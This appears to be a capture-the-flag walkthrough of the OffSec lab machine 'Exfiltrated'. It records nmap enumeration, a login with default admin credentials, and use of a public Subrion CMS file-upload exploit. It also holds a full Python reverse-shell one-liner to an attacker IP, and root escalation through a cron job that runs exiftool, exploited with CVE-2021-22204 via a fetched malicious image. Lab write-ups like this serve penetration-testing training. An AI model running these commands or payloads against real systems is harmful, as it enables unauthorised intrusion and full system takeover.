Exfiltrated
Enumeration
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
Subrion CMS 4.2.1
Default credentials - admin:admin
Subrion CMS 4.2.1 - Arbitrary File Upload
https://www.exploit-db.com/exploits/49876
Initial Access
$ python3 49876 -u http://exfiltrated.offsec/panel/ --user admin --passw admin
Got webshell. Executed this command to reverse shell.
export RHOST="192.168.49.145";export RPORT=80;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
PrivEsc
www-data@exfiltrated:/tmp$ cat /etc/crontab
* * * * * root bash /opt/image-exif.sh
---
www-data@exfiltrated:/tmp$ cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
ExifTool Version Number : 11.88
exiftool -> CVE-2021-22204-exiftool
https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
CVE-2021-22204 can be triggered with a perfectly valid image (jpg, tiff, mp4 and many more) leading to arbitrary code execution! Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44(to 12.24+) and up allows arbitrary code execution when parsing the malicious image.
https://github.com/convisolabs/CVE-2021-22204-exiftool
$ sudo apt install djvulibre-bin exiftool
Change the IP and Port in the exploit.py file
$ git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git
$ cd CVE-2021-22204-exiftool
$ python3 exploit.py
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget http://192.168.49.145/image.jpg
Last updated